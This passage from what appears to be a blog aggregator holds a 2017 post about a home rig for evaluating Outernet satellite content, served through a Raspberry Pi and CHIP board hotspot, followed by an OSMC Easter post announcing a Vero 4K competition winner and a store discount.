So, what might I talk about at OggCamp 17 if I had the time? Right now the evaluation project, with the helpful backing of three fabulous sponsors, is continuing in limited fashion relative to Outernet. We have a rig and it is set up. The garage is the safest place to put it although I eventually want to get an uninterruptible power supply for it due to the flaky electrical service we have at times.

The hidden rig with a WiFi access point attached for signal boost

Although there was a talk by Daniel Estévez about Outernet at Chaos Communication Congress 33 that I still have not watched, it appears I am approaching things from a different angle. I'm looking at this from the perspective of evaluating the content being distributed and how it is chosen. Daniel evaluated hardware.

The What's New screen seen from my cell phone's Firefox browser on Android
The tuner screen

There is still much to review. Currently I'm copying the receiver's take and putting it on a Raspberry Pi in the house that is running on the internal network, with lighttpd pointing at the directory so that I can view the contents. Eventually I'll figure out how to get the necessary WiFi bridging done to bring the CHIP board's minuscule hotspot signal from the detached garage into the house. Currently there is a WiFi extender right next to the CHIP so I don't have to be so close to the board to be able to pick up the hotspot signal while using my laptop.

Things remain in progress, of course.

17 April, 2017 03:10AM

April 16, 2017

hackergotchi for OSMC


Happy Easter from OSMC

We'd like to wish all of our users a Happy Easter. We hope you're enjoying a well deserved break and watching tons of TV!

Easter competition

We recently announced a competition to win a Vero 4K on our Facebook and Twitter accounts. We're happy to announce that the winner of a brand new Vero 4K is Mark S.

For those that didn't win: we've still some good news. We're offering 10% off everything in our Store (including Vero 4K), this week only. Get the best OSMC experience here.

16 April, 2017 06:45PM by Sam Nazarko